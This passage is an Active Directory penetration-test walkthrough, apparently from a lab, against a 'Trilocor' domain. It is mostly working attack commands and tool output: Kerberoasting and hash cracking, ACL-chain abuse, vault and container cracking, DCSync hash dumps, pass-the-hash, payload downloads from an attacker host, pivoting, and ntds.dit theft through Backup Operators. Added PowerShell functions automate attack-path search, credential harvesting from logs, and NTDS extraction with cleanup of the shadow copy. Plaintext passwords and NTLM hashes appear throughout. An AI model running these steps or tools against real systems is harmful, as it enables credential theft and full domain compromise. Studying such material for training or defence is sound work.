$krb5tgs$23$*sapvc$TRILOCOR.LOCAL$trilocor.local/sapvc*$0416dfb7a662c9df8574c3e920c39f2d$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:!qaz2wsx3edc
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: ksalinas-kerberosating.hashes
Time.Started.....: Tue Jan 21 06:08:05 2025 (2 mins, 25 secs)
Time.Estimated...: Tue Jan 21 06:10:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 911.5 kH/s (0.31ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 4/13 (30.77%) Digests (total), 4/13 (30.77%) Digests (new), 4/13 (30.77%) Salts
Progress.........: 186477005/186477005 (100.00%)
Rejected.........: 0/186477005 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:12 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 83%

Started: Tue Jan 21 06:07:55 2025
Stopped: Tue Jan 21 06:10:32 2025
Self: Query the ACLs of every object in the domain and keep only the ACEs whose SecurityIdentifier is the SID of the ksalinas user.
$sid = Convert-NameToSid ksalinas
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ActiveDirectoryRights: Self means the ACE grants a validated write that the principal may exercise on itself. On a group object, with the ObjectAceType resolving to Self-Membership (the member attribute), that lets ksalinas add or remove only its own account as a member of the group; it grants nothing else on the object.
Add ksalinas to the MSSP CONNECT group
$SecPassword = ConvertTo-SecureString 'atm@#5' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('trilocor\ksalinas', $SecPassword)
Add-DomainGroupMember -Credential $Cred -Identity 'MSSP CONNECT' -Members 'ksalinas' -Verbose
FILESHARE ADMINS: Look up the Transitive Object Control of the MSSP CONNECT group in BloodHound
MSSP CONNECT has WriteOwner on TIER I INFRASTRUCTURE, so it can change the owner of the TIER I INFRASTRUCTURE group
TIER I INFRASTRUCTURE has GenericWrite on FILESHARE ADMINS, so it can modify that group's membership directly
FILESHARE ADMINS most likely has administrative rights on the domain file share server
WriteOwner: change the owner of the TIER I INFRASTRUCTURE group to the ksalinas user
$SecPassword = ConvertTo-SecureString 'atm@#5' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('trilocor\ksalinas', $SecPassword)
Set-DomainObjectOwner -Credential $Cred -Identity "TIER I INFRASTRUCTURE" -OwnerIdentity ksalinas -Verbose
Now that ksalinas owns the object (and an owner is always allowed to write the DACL), grant ksalinas full control over TIER I INFRASTRUCTURE
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "TIER I INFRASTRUCTURE" -PrincipalIdentity ksalinas -Rights All -Verbose
ksalinas can then be added to the TIER I INFRASTRUCTURE group
Add-DomainGroupMember -Credential $Cred -Identity 'TIER I INFRASTRUCTURE' -Members 'ksalinas' -Verbose
Verify the membership of TIER I INFRASTRUCTURE
Get-DomainGroupMember -Identity 'TIER I INFRASTRUCTURE'
GenericWrite: add the ksalinas user to the FILESHARE ADMINS group
$SecPassword = ConvertTo-SecureString 'atm@#5' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('trilocor\ksalinas', $SecPassword)
Add-DomainGroupMember -Credential $Cred -Identity 'FILESHARE ADMINS' -Members 'ksalinas' -Verbose
List the members of FILESHARE ADMINS
Get-DomainGroupMember -Identity 'FILESHARE ADMINS'
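The ACL chain above (Self on MSSP CONNECT, WriteOwner on TIER I INFRASTRUCTURE, GenericWrite on FILESHARE ADMINS) was walked by hand in BloodHound. The following is an added example, not code from the original write-up or from PowerView: it classifies PowerView-style ACEs by what an attacker can actually do with them and then searches breadth-first for a path from a starting SID to a target object, which generalises the single chain on this page. The right names and GUIDs are the real Active Directory values; the SIDs and DNs in the sample ACL are constructed to mirror this page's groups, and `New-Ace`, `Get-AbusableAce` and `Find-AclPath` are this example's own helpers.

```powershell
# Added example (not from the original write-up). Turn Get-DomainObjectAcl output into
# "principal -> right -> object" edges and walk them from a starting SID.
$MemberGuid  = 'bf9679c0-0de6-11d0-a285-00aa003049e2'   # 'member' attribute / Self-Membership validated write
$DcSyncGuids = @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', # DS-Replication-Get-Changes
                 '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2') # DS-Replication-Get-Changes-All

function Get-AbusableAce {
    param([Parameter(Mandatory, ValueFromPipeline)]$Ace)
    process {
        if ("$($Ace.AceType)" -like '*Denied*') { return }          # deny ACEs do not give us anything
        $rights  = ([string]$Ace.ActiveDirectoryRights) -split ',\s*'
        $aceType = "$($Ace.ObjectAceType)"
        # empty / zero ObjectAceType = the right covers every attribute and extended right
        $allProps = ($aceType -eq '' -or $aceType -eq '00000000-0000-0000-0000-000000000000' -or $aceType -eq 'All')
        $onMember = $allProps -or ($aceType -in @($MemberGuid, 'Member', 'Self-Membership'))
        $abuse =
            if     ($rights -contains 'GenericAll') { 'GenericAll: reset password / add members / rewrite DACL' }
            elseif ($rights -contains 'WriteDacl')  { 'WriteDacl: grant yourself any right (GenericAll, or DCSync on the domain object)' }
            elseif ($rights -contains 'WriteOwner') { 'WriteOwner: take ownership, then the owner may rewrite the DACL' }
            elseif ($rights -contains 'GenericWrite' -or ($rights -contains 'WriteProperty' -and $onMember)) { 'WriteProperty(member): add any principal to the group' }
            elseif ($rights -contains 'Self' -and $onMember) { 'Self-Membership: add only your own account to the group' }
            elseif ($rights -contains 'ExtendedRight' -and ($allProps -or $aceType -in $DcSyncGuids -or $aceType -like 'DS-Replication-Get-Changes*')) { 'DCSync (needs both Get-Changes rights)' }
        if ($abuse) {
            [pscustomobject]@{
                Principal = [string]$Ace.SecurityIdentifier
                Rights    = [string]$Ace.ActiveDirectoryRights
                Target    = $Ace.ObjectDN
                TargetSid = [string]$Ace.ObjectSID
                Abuse     = $abuse
            }
        }
    }
}

function Find-AclPath {
    param([string]$StartSid, [string]$TargetDn, [object[]]$Edges)
    # Breadth-first search. An abusable ACE on a group lets the attacker become a member of
    # that group, so the group's SID becomes a new principal to continue the search from.
    $queue = [System.Collections.Generic.List[object]]::new()
    $queue.Add(@{ Sid = $StartSid; Path = @() })
    $seen = @{ $StartSid = $true }
    for ($i = 0; $i -lt $queue.Count; $i++) {
        $node = $queue[$i]
        foreach ($e in @($Edges | Where-Object { $_.Principal -eq $node.Sid })) {
            $path = @($node.Path) + $e
            if ($e.Target -eq $TargetDn) { return $path }
            if ($e.TargetSid -and -not $seen[$e.TargetSid]) {
                $seen[$e.TargetSid] = $true
                $queue.Add(@{ Sid = $e.TargetSid; Path = $path })
            }
        }
    }
}

# Constructed sample ACL (assumed SIDs/DNs) reproducing this page's chain, plus one harmless ACE.
$Sid = @{ ksalinas = 'S-1-5-21-1111-2222-3333-1724'; mssp = 'S-1-5-21-1111-2222-3333-2001'
          tier1    = 'S-1-5-21-1111-2222-3333-2002'; fsadm = 'S-1-5-21-1111-2222-3333-2003' }
$Dn  = @{ mssp  = 'CN=MSSP CONNECT,OU=Groups,DC=trilocor,DC=local'
          tier1 = 'CN=TIER I INFRASTRUCTURE,OU=Groups,DC=trilocor,DC=local'
          fsadm = 'CN=FILESHARE ADMINS,OU=Groups,DC=trilocor,DC=local' }
function New-Ace($TargetDn, $TargetSid, $Rights, $Principal, $Type = $null) {
    [pscustomobject]@{ ObjectDN = $TargetDn; ObjectSID = $TargetSid; ActiveDirectoryRights = $Rights
                       ObjectAceType = $Type; SecurityIdentifier = $Principal; AceType = 'AccessAllowed' }
}
$SampleAcl = @(
    (New-Ace $Dn.mssp  $Sid.mssp  'Self'                         $Sid.ksalinas 'Self-Membership')
    (New-Ace $Dn.tier1 $Sid.tier1 'WriteOwner'                   $Sid.mssp)
    (New-Ace $Dn.fsadm $Sid.fsadm 'GenericWrite'                 $Sid.tier1)
    (New-Ace $Dn.fsadm $Sid.fsadm 'ReadProperty, GenericExecute' $Sid.ksalinas)   # noise: not abusable
)

$edges = $SampleAcl | Get-AbusableAce
$edges | Format-Table Principal, Rights, Target, Abuse -AutoSize
$chain = Find-AclPath -StartSid $Sid.ksalinas -TargetDn $Dn.fsadm -Edges $edges
$chain | ForEach-Object { '{0} --[{1}]--> {2}' -f $_.Principal, $_.Rights, $_.Target }
# Live use: Get-DomainObjectAcl -ResolveGUIDs -Identity * | Get-AbusableAce
```

The search treats every edge as "becoming" the target group in one hop; in practice a WriteOwner edge costs two extra commands (Set-DomainObjectOwner, then Add-DomainObjectAcl) before the Add-DomainGroupMember, exactly as the steps above show, while Self and GenericWrite edges are a single group-membership write.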
SMB Share: Enumerating the SMB shares again shows that Department Shares now carries Write permission
Under \Department Shares\IT\Private\IT_BACKUP02072022\ there is a backup file, Trilocor_backup_03072022.vc
Network latency over the pivot is too high, so mount the share on WEB-NIX01 and serve the file from there over HTTP
sudo mkdir -p /mnt/DC01/'Department Shares'
sudo mount -t cifs //172.16.139.3/'Department Shares' /mnt/DC01/'Department Shares' -o username=ksalinas,password='atm@#5'
cd /mnt/DC01/Department\ Shares/IT/Private/IT_BACKUP02072022
python3 -m http.server 2025
Trilocor_backup_03072022.vc is a VeraCrypt container; try cracking it with hashcat. hashcat reads the volume header straight from the container file; mode 13751 assumes a SHA-256 PBKDF2 header and a 512-bit XTS key, so if the container was created with other settings one of the other VeraCrypt modes (137xx / 294xx) has to be tried.
$ hashcat -m 13751 Trilocor_backup_03072022.vc /usr/share/wordlists/rockyou.txt
<SNIP>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Trilocor_backup_03072022.vc:qazwsx

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13751 (VeraCrypt SHA256 + XTS 512 bit (legacy))
Hash.Target......: Trilocor_backup_03072022.vc
Time.Started.....: Tue Jan 21 12:14:25 2025 (1 min, 15 secs)
Time.Estimated...: Tue Jan 21 12:15:40 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10 H/s (6.16ms) @ Accel:256 Loops:250 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 768/14344385 (0.01%)
Rejected.........: 0/768 (0.00%)
Restore.Point....: 512/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:499750-499999
Candidate.Engine.: Device Generator
Candidates.#1....: hockey -> james1
Hardware.Mon.#1..: Util: 96%

Started: Tue Jan 21 12:13:58 2025
Stopped: Tue Jan 21 12:15:41 2025
WS01 has VeraCrypt on its desktop, so transfer Trilocor_backup_03072022.vc to WS01
iwr http://172.16.139.10:2222/Trilocor_backup_03072022.vc -o Trilocor_backup_03072022.vc
Select the file, pick any free drive letter, click Mount at the bottom left and enter the cracked password
On the mounted volume, in Z:\Private, the file trilocor_svc_vault.psafe3 stands out by its extension; download it
trilocor_svc_vault.psafe3 is an encrypted Password Safe database
Crack its master password with hashcat
$ hashcat -h | grep 'Password Safe'
   9000 | Password Safe v2                                           | Password Manager
   5200 | Password Safe v3                                           | Password Manager
$ hashcat -m 5200 trilocor_svc_vault.psafe3 /usr/share/wordlists/rockyou.txt
<SNIP>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

trilocor_svc_vault.psafe3:thevault!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: trilocor_svc_vault.psafe3
Time.Started.....: Tue Jan 21 12:33:48 2025 (5 mins, 19 secs)
Time.Estimated...: Tue Jan 21 12:39:07 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10300 H/s (9.62ms) @ Accel:256 Loops:512 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3244032/14344385 (22.62%)
Rejected.........: 0/3244032 (0.00%)
Restore.Point....: 3243520/14344385 (22.61%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#1....: theview2007 -> thetriggerman
Hardware.Mon.#1..: Util: 98%

Started: Tue Jan 21 12:33:39 2025
Stopped: Tue Jan 21 12:39:08 2025
or, with John the Ripper
pwsafe2john trilocor_svc_vault.psafe3 > psafe3.hash
john --wordlist=/usr/share/wordlists/rockyou.txt psafe3.hash
Then install the Password Safe client (install the .deb first, then let apt pull in any missing dependencies)
wget https://github.com/pwsafe/pwsafe/releases/download/1.20.0/passwordsafe-debian12-1.20-amd64.deb
sudo dpkg -i passwordsafe-debian12-1.20-amd64.deb
sudo apt install -f
Open the database with the cracked master password; select an entry and use the Password item in the menu bar to copy its password
Five sets of credentials were recovered
svc_mssql:mssqladm
svc_sql:Sup3rPr0d4cti0NS3rv3r
svc_ipm:calvin
svc_azc:Sup3rPr0d4ctioNs3rv3r
svc_trilocorsync:Synchronicity_21
DCSync: The Find Shortest Paths to Domain Admins query shows that the svc_trilocorsync user holds WriteDacl on the domain object. WriteDacl allows changing the object's access control list, including granting itself or another user additional rights such as DCSync (the two DS-Replication-Get-Changes extended rights).
WriteDacl: grant svc_trilocorsync DCSync rights on the domain
$SecPassword = ConvertTo-SecureString 'Synchronicity_21' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('trilocor\svc_trilocorsync', $SecPassword)
# Add-ObjectAcl is the legacy alias of Add-DomainObjectAcl in current PowerView. The domain object itself is the
# target, and -Credential makes the ACE get written as svc_trilocorsync rather than as the current session user.
Add-ObjectAcl -Credential $Cred -TargetIdentity "DC=trilocor,DC=local" -TargetDomain "trilocor.local" -PrincipalIdentity svc_trilocorsync -Rights DCSync -Verbose
DCSync: run DCSync with impacket-secretsdump
$ impacket-secretsdump trilocor/svc_trilocorsync:Synchronicity_21@172.16.139.3 -just-dc -outputfile trilocor-dcsync
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:716ee2e3322df8be443de416ca20154f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f15e59fe4d6812b54e265d9a48354848:::
trilocor.local\avazquez:1724:aad3b435b51404eeaad3b435b51404ee:762cbc5ea2edfca03767427b2f2a909f:::
trilocor.local\pfalcon:1725:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539:::
trilocor.local\fanthony:1726:aad3b435b51404eeaad3b435b51404ee:9827f62cf27fe221b4e89f7519a2092a:::
trilocor.local\wdillard:1727:aad3b435b51404eeaad3b435b51404ee:69ada25bbb693f9a85cd5f176948b0d5:::
<SNIP>
Connect to DC01 with evil-winrm using the Administrator hash
Interface
RDP could also be enabled and LaZagne used to harvest stored credentials, but this Windows edition has no desktop. Note that flipping fDenyTSConnections alone is not enough on a host with the firewall on; the "Remote Desktop" firewall rule group has to be enabled as well.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Domain Trusts: connect with impacket psexec to get a full SYSTEM environment and, from that shell, fetch an MSF payload
impacket-psexec administrator@172.16.139.3 --hashes :716ee2e3322df8be443de416ca20154f
iwr http://172.16.139.10:2222/xx.exe
Switch to MSF for a more stable shell
Enumerate domain trusts
Import-Module .\PowerView.ps1
Get-DomainTrust
The output lists the trust relationships: trilocor.local and trilocorai.local share a bidirectional, transitive forest trust.
List the objects that have delegation configured
# 524288 (0x80000) is TRUSTED_FOR_DELEGATION, i.e. unconstrained delegation; a populated msDS-AllowedToDelegateTo means
# constrained delegation. objectClass=user also matches computer accounts, so DC01$ shows up here.
Get-DomainObject -LDAPFilter "(&(objectClass=user)(|(userAccountControl:1.2.840.113556.1.4.803:=524288)(msDS-AllowedToDelegateTo=*)))"
DC01$ is a computer account with TRUSTED_FOR_DELEGATION set, meaning it is trusted for unconstrained delegation. Domain controllers carry this flag by default, so DC01$ appearing here is expected; the interesting finding would be any non-DC user or computer account in this list.
Query the accounts with SPNs in the trilocorai.local domain
Upload Rubeus.exe and run a Kerberoasting attack across the trust
iwr http://172.16.139.10:2222/Rubeus.exe
PS C:\Users\Administrator\Documents> .\Rubeus.exe kerberoast /domain:trilocorai.local /user:svc_datakeeper /nowrap
.\Rubeus.exe kerberoast /domain:trilocorai.local /user:svc_datakeeper /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : svc_datakeeper
[*] Target Domain          : trilocorai.local
[*] Searching path 'LDAP://DC02.trilocorai.local/DC=trilocorai,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svc_datakeeper)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1

[*] SamAccountName         : svc_datakeeper
[*] DistinguishedName      : CN=svc_datakeeper,CN=Users,DC=trilocorai,DC=local
[*] ServicePrincipalName   : datakeeper/admin01.trilocorai.local:80
[*] PwdLastSet             : 7/26/2022 7:09:36 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*svc_datakeeper$trilocorai.local$datakeeper/admin01.trilocorai.local:80@trilocorai.local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
Crack it with hashcat
$ hashcat -m 13100 svc_datakeeper.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: cpu--0x000, 1437/2938 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$krb5tgs$23$*svc_datakeeper$trilocorai.local$datakeeper/admin01.trilocorai.local:80@trilocorai.local*$a5648791750acd2988df5859bf279fef$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:data@system

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_datakeeper$trilocorai.local$datake...622efa
Time.Started.....: Thu Jan 23 14:33:25 2025 (7 secs)
Time.Estimated...: Thu Jan 23 14:33:32 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1172.6 kH/s (0.34ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 8761344/14344385 (61.08%)
Rejected.........: 0/8761344 (0.00%)
Restore.Point....: 8760832/14344385 (61.07%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: dataking -> dasuag101
Hardware.Mon.#1..: Util: 84%

Started: Thu Jan 23 14:33:24 2025
Stopped: Thu Jan 23 14:33:34 2025
Double Pivot: in the ligolo-ng proxy, add a listener on the WEB-NIX01 agent that forwards back to the attack box, create a second interface and route the DC02 subnet through it
[Agent : root@WEB-NIX01] » listener_add --addr 172.16.139.10:11601 --to 10.10.16.2:11601 --tcp
INFO[3551] Listener 0 created on remote agent!
[Agent : root@WEB-NIX01] » ifcreate --name ligolo2
[Agent : root@WEB-NIX01] » route_add --name ligolo2 --route 172.16.210.0/24
Upload the ligolo-ng agent.exe to DC01 through evil-winrm, then run it so it connects back through the listener on WEB-NIX01
.\agent.exe -connect 172.16.139.10:11601 -ignore-cert
Another Intranet: DC02
evil-winrm -i 172.16.210.5 -u svc_datakeeper -p data@system
Privilege Escalation: svc_datakeeper is a member of Event Log Readers, a group that may read the Security event log
Read the newest Security events and grep for /user
wevtutil qe Security /rd:true /f:text | Select-String "/user"
One record shows net.exe mapping a share with the svc_veracrypt credentials passed on the command line (process creation events carry the full command line when command-line auditing is enabled, which is what makes this leak visible to a log reader)
svc_veracrypt:Au10_B@ckuP_cRy3t
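The wevtutil pipe above grabs every line containing "/user". As an added example that is not part of the original write-up, the script below does the same hunt more precisely: it reads process creation events (ID 4688) with Get-WinEvent, pulls out the command line, and parses the credential-carrying forms of net use, cmdkey, schtasks, wmic and psexec so the user and password come back as fields. Assumptions: 4688 events are present with command-line auditing on (CommandLine is EventData index 8), and the sample command lines at the bottom are constructed for offline testing (the svc_veracrypt line mirrors the finding above but is not the actual log record).

```powershell
# Added example (not from the original write-up): find credentials passed on process command lines.
function Find-CommandLineCredential {
    param([Parameter(ValueFromPipeline)][string]$CommandLine)
    process {
        if (-not $CommandLine) { return }
        $tokens = @($CommandLine -split '\s+' | Where-Object { $_ })
        $exe    = ($tokens[0] -replace '"', '') -replace '^.*[\\/]', ''   # "C:\Windows\system32\net.exe" -> net.exe
        $tool = $null; $user = $null; $pass = $null

        # net use <drive|UNC> [password] /user:NAME [password]; a "*" password means "prompt", so no leak
        if ($exe -match '^net(\.exe)?$' -and $tokens.Count -gt 2 -and $tokens[1] -eq 'use') {
            $ui = -1
            for ($i = 2; $i -lt $tokens.Count; $i++) {
                if ($tokens[$i] -match '^/user:(.+)$') { $ui = $i; $user = $Matches[1] }
            }
            if ($ui -ge 0) {
                foreach ($j in @($ui - 1, $ui + 1)) {                      # password sits right before or after /user:
                    if ($j -lt 2 -or $j -ge $tokens.Count) { continue }
                    # skip switches, UNC paths, drive letters and the "*" prompt marker
                    if ($tokens[$j] -notmatch '^(/|\\\\|[A-Za-z]:$|\*$)') { $tool = 'net use'; $pass = $tokens[$j]; break }
                }
            }
        }

        # tools whose syntax names the password explicitly
        $generic = @(
            @{ Tool = 'cmdkey';   Rx = '(?i)\bcmdkey(?:\.exe)?\b.*?/user:(?<user>\S+).*?/pass:(?<pass>\S+)' }
            @{ Tool = 'schtasks'; Rx = '(?i)\bschtasks(?:\.exe)?\b.*?/ru\s+(?<user>\S+).*?/rp\s+(?<pass>\S+)' }
            @{ Tool = 'wmic';     Rx = '(?i)\bwmic(?:\.exe)?\b.*?/user:(?<user>\S+).*?/password:(?<pass>\S+)' }
            @{ Tool = 'psexec';   Rx = '(?i)\bpsexec(?:64)?(?:\.exe)?\b.*?\s-u\s+(?<user>\S+).*?\s-p\s+(?<pass>\S+)' }
        )
        if (-not $pass) {
            foreach ($g in $generic) {
                if ($CommandLine -match $g.Rx) { $tool = $g.Tool; $user = $Matches.user; $pass = $Matches.pass; break }
            }
        }
        if ($pass) { [pscustomobject]@{ Tool = $tool; User = $user; Password = $pass; CommandLine = $CommandLine } }
    }
}

function Get-CommandLineCredentialFromSecurityLog {
    param([int]$MaxEvents = 5000)
    # 4688 = "A new process has been created"; Properties[8] is CommandLine when command-line auditing is enabled (assumption)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object { $_.Properties[8].Value } |
        Find-CommandLineCredential
}

# Constructed sample command lines (not real log records) to exercise the parser offline
$SampleCommandLines = @(
    'net use Z: \\DC02\Backups Au10_B@ckuP_cRy3t /user:svc_veracrypt'        # leaks: password before /user:
    'C:\Windows\system32\net.exe use \\fileserver\it /user:svc_backup *'      # "*" = prompted, nothing to take
    'cmdkey /add:sql01 /user:sqlsvc /pass:S3cret!'                            # leaks via /pass:
    '"C:\Windows\System32\svchost.exe" -k netsvcs'                            # unrelated process
)
$SampleCommandLines | Find-CommandLineCredential | Format-Table Tool, User, Password -AutoSize
# On DC02 as svc_datakeeper: Get-CommandLineCredentialFromSecurityLog
```

The same parser is useful on the blue side: feed it 4688 command lines from a SIEM export and it flags every scheduled task, mapped drive and cmdkey entry that was created with a plaintext password, which is the class of mistake that handed over svc_veracrypt here.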
svc_veracrypt is a member of Backup Operators. That group holds SeBackupPrivilege, which bypasses file ACLs for reads as long as the file is opened with backup semantics (FILE_FLAG_BACKUP_SEMANTICS); an ordinary copy command does not open files that way and still fails, so a tool that uses the privilege is needed
Connect over WinRM as svc_veracrypt
evil-winrm -i 172.16.210.5 -u svc_veracrypt -p 'Au10_B@ckuP_cRy3t'
NTDS.dit is locked while the directory service is running, so use the Windows diskshadow utility to create a volume shadow copy of the C: drive and expose it as drive X:
diskshadow cannot be used interactively from a WinRM shell, so write its commands to a script file test.dsh
set metadata C:\Windows\Temp\meta.cab
set context persistent nowriters
add volume C: alias cdrive
create
expose %cdrive% X:
exit
Convert the file from Unix to DOS line endings (unix2dos); diskshadow expects CRLF in its script file
Upload it to DC02 with evil-winrm and run it
diskshadow.exe /s test.dsh
Then upload the two SeBackupPrivilege tool DLLs (SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll) with evil-winrm, import them, copy ntds.dit out of the shadow copy, and download the copy with evil-winrm
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege X:\Windows\ntds\ntds.dit .\ntds.dit
Dump HKLM\SYSTEM (it holds the boot key needed to decrypt the hashes) and download it the same way
reg save HKLM\SYSTEM SYSTEM.SAV
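The DC02 steps above (script file, diskshadow, SeBackupPrivilege copy, SYSTEM hive) as one function that runs inside the evil-winrm session. This is an added example, not the original write-up's commands: it writes the .dsh with CRLF line endings itself (so no unix2dos round trip), checks that the shadow copy really is exposed before copying, and deletes that shadow afterwards so it is not left on the domain controller. Assumptions: the SeBackupPrivilege DLLs are already uploaded to the working directory, output goes to C:\Windows\Temp, and the function name is this example's own.

```powershell
# Added example (not from the original write-up): Backup Operators -> ntds.dit + SYSTEM in one go.
function Invoke-NtdsBackupCopy {
    param(
        [string]$ShadowDrive = 'X:',
        [string]$OutDir      = 'C:\Windows\Temp',
        [string]$ToolDir     = $PWD.Path        # where SeBackupPrivilege*.dll were uploaded (assumption)
    )
    $ntds = Join-Path $OutDir 'ntds.dit'
    $sys  = Join-Path $OutDir 'SYSTEM.SAV'

    # 1. diskshadow script, written with explicit CRLF so diskshadow parses it
    $dsh = Join-Path $OutDir 'shadow.dsh'
    $script = @(
        "set metadata $OutDir\meta.cab",
        'set context persistent nowriters',
        'add volume C: alias cdrive',
        'create',
        "expose %cdrive% $ShadowDrive",
        'exit'
    ) -join "`r`n"
    [IO.File]::WriteAllText($dsh, $script + "`r`n", [Text.Encoding]::ASCII)

    # 2. create and expose the shadow copy (SeBackupPrivilege is enough; no admin needed)
    $out = & diskshadow.exe /s $dsh 2>&1
    if (-not (Test-Path "$ShadowDrive\Windows\NTDS\ntds.dit")) {
        throw "Shadow copy was not exposed as $ShadowDrive`n$($out -join "`n")"
    }

    # 3. copy with backup semantics; a plain Copy-Item still hits the NTDS ACL and fails
    Import-Module (Join-Path $ToolDir 'SeBackupPrivilegeUtils.dll')
    Import-Module (Join-Path $ToolDir 'SeBackupPrivilegeCmdLets.dll')
    Remove-Item $ntds -ErrorAction SilentlyContinue
    Copy-FileSeBackupPrivilege "$ShadowDrive\Windows\NTDS\ntds.dit" $ntds

    # 4. SYSTEM hive: secretsdump needs its boot key to decrypt the PEK and the hashes
    & reg.exe save HKLM\SYSTEM $sys /y | Out-Null

    # 5. clean up: delete only the shadow we exposed (not "delete shadows all", which would
    #    remove any legitimate shadow copies on the DC too)
    $cleanup = Join-Path $OutDir 'cleanup.dsh'
    [IO.File]::WriteAllText($cleanup, "delete shadows exposed $ShadowDrive`r`nexit`r`n", [Text.Encoding]::ASCII)
    & diskshadow.exe /s $cleanup | Out-Null
    Remove-Item $dsh, $cleanup -ErrorAction SilentlyContinue

    Get-Item $ntds, $sys     # download both with evil-winrm's download command
}

Invoke-NtdsBackupCopy
```

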